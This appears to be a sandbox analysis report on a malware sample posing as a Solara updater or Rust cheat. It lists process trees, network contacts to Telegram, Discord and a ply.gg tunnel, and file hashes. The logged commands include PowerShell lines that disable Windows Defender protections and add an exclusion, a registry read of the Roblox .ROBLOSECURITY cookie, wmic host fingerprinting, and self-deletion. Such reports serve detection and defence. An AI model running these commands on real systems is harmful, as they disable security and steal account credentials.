C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2136-0-0x000007FEF5783000-0x000007FEF5784000-memory.dmp

memory/2136-1-0x0000000000840000-0x0000000000A26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/2888-11-0x0000000001250000-0x000000000127A000-memory.dmp

memory/2136-14-0x000007FEF5780000-0x000007FEF616C000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

memory/2888-23-0x000007FEF5780000-0x000007FEF616C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

memory/1956-48-0x0000000000D40000-0x0000000000D56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/2888-50-0x000007FEF5780000-0x000007FEF616C000-memory.dmp

memory/276-49-0x0000000001210000-0x0000000001250000-memory.dmp

C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat

MD5 02d21af8c5d6e8e0240a01325bcc4154
SHA1 ce58641040b6fe35d465a8a6932c277c7ff37ee5
SHA256 31498b70dce38481c709a35f22dbab0bde2be880abe88d6c90b7a96bf9f070b7
SHA512 758201561db3058e8d6d18c9a838fd49aa612fe0ef544479cc5776e4618ee4e90245b41b1bdb90257298c27fb6ee2589a262f8143816fa091be88a1ca977f7e8

\hostNet\bridgeblockportComBroker.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/1680-119-0x00000000003B0000-0x000000000058E000-memory.dmp

memory/1680-121-0x0000000000380000-0x000000000038E000-memory.dmp

memory/1680-123-0x0000000000690000-0x00000000006AC000-memory.dmp

memory/1680-125-0x0000000002080000-0x0000000002098000-memory.dmp

